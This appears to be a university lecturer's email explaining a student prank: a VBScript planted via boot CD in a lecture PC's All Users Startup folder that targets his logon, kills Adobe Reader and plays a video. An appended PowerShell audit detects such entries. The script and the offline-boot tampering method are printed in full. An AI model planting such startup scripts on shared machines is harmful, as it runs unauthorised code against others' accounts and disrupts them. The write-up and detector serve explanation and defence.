Delivery-date: Tue, 20 May 2008 14:02:15 +0100
To: wednesday@cl.cam.ac.uk, security-group@cl.cam.ac.uk
Subject: Malware in LT1
From: Markus Kuhn

So it seems some of my "Introduction to Security" Part Ib students have already learned quite a lot in this course: I have been "Rickroll'd" today half way during the last lecture on the LT1 presentation PC.

  http://en.wikipedia.org/wiki/Rickroll

Technical details:

The perpetrators apparently used a Linux boot CD with NTFS driver to place on the LT1 PC some files into C:\Temp and a link to the following script into C:\Programs and Settings\All users\Start Menu\Programs\Startup:

--------------------------------------------------------------------------------
Dim WshShell,oExec
Set WSHNetwork = CreateObject("WScript.Network")
strUserName = WSHNetwork.UserName
' Only fire for one specific logon name
If strUserName = "mgk25" Then
  ' Wait 10 minutes (600 000 ms) before doing anything
  WScript.Sleep 600000
  Set WshShell = wscript.createobject("wscript.shell")
  Set Shell = wscript.createobject("Shell.Application")
  'Shell.MinimizeAll
  ' Find and terminate any running Adobe Reader via WMI
  Set objWMIService = GetObject("Winmgmts:")
  Set colProcessList = objWMIService.ExecQuery _
    ("Select * from Win32_Process where Name = 'AcroRd32.exe'")
  If colProcessList.count > 0 then
    For Each objProcess In colProcessList
      objProcess.Terminate()
    Next
  End If
  ' Play the video fullscreen, on top, at high priority
  Set oExec = WshShell.Exec("C:\temp\vlc\vlc.exe -f --video-on-top --high-priority c:\temp\rickroll.wmv")
End If
--------------------------------------------------------------------------------

So if anyone logs in, this script will check whether it is me (they had to use "All users" because my personal settings reside password-protected on the filer). If so, it then sleeps for 10 min (600 000 ms) before terminating Adobe Reader and replacing it with the also installed VLC video player playing the Rick Astley song "Never Gonna Give You Up" (plus some added subtitles about lessons learned on correct BIOS configuration of publicly accessible PCs).
There is a copy of the played video and other files at

  /auto/userfiles/mgk25/unix_home/w/teaching/security1/prank-2008/rickroll.wmv
  \\filer\userfiles\mgk25\unix_home\w\teaching\security1\prank-2008\rickroll.wmv

Markus

P.S.: No need to check the security cameras, I have already received two full confessions ...

-- 
Markus Kuhn, Computer Laboratory, University of Cambridge
http://www.cl.cam.ac.uk/~mgk25/ || CB3 0FD, Great Britain
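As an added defender's check (not part of the message above, and not the Lab's own tooling), this PowerShell audit lists what the All Users and per-user Startup folders will actually run at logon, resolving .lnk shortcuts and flagging the traits of the script described above: a script-host target, a payload living under a Temp directory, and script contents that read the logon name, sleep for a long time, terminate processes via WMI, or Exec another program. It assumes PowerShell 3 or later on Windows and the WScript.Shell COM object; the indicator patterns are drawn from the posted script and are illustrative.

```powershell
# Added example: audit Startup folders for entries like the LT1 prank script.
$startupDirs = @(
    [Environment]::GetFolderPath('CommonStartup'),   # All Users ... \Startup
    [Environment]::GetFolderPath('Startup')          # current user's Startup
)
$shell = New-Object -ComObject WScript.Shell

# Indicators taken from the script in the message (illustrative, not exhaustive).
$scriptPatterns = 'WScript\.Network', '\.UserName', 'WScript\.Sleep\s+\d{5,}',
                  'Win32_Process', '\.Terminate\(', '\.Exec\('

foreach ($dir in $startupDirs) {
    if (-not (Test-Path $dir)) { continue }
    foreach ($entry in Get-ChildItem -Path $dir -File) {
        $target  = $entry.FullName
        $lnkArgs = ''
        if ($entry.Extension -ieq '.lnk') {
            # Resolve the shortcut to the program/script it launches.
            $lnk     = $shell.CreateShortcut($entry.FullName)
            $target  = $lnk.TargetPath
            $lnkArgs = $lnk.Arguments
        }
        $cmdline    = "$target $lnkArgs"
        $suspicious = @()
        if ($target -match '\\(wscript|cscript|mshta|powershell)\.exe$' -or
            $cmdline -match '\.(vbs|js|wsf|hta|ps1)(\s|"|$)') {
            $suspicious += 'runs a script host or script file'
        }
        if ($cmdline -match '\\Te?mp\\') {
            $suspicious += 'payload lives under a Temp directory'
        }
        # If a script file is involved, grep it for the indicator patterns.
        $scriptFile = ($cmdline -replace '"', '') -split '\s+' |
            Where-Object { $_ -match '\.(vbs|js|wsf)$' } | Select-Object -First 1
        if ($scriptFile -and (Test-Path $scriptFile)) {
            $hits = Select-String -Path $scriptFile -Pattern $scriptPatterns |
                ForEach-Object { $_.Pattern } | Sort-Object -Unique
            if ($hits) { $suspicious += "script contains: $($hits -join ', ')" }
        }
        [PSCustomObject]@{
            Entry      = $entry.FullName
            Target     = $target
            Arguments  = $lnkArgs
            Modified   = $entry.LastWriteTime
            Suspicious = ($suspicious -join '; ')
        }
    }
}
```

Run it as the user who will log on to the shared PC; an entry whose Modified time post-dates the machine's last known maintenance and whose Suspicious column is non-empty is the one to pull before the next lecture.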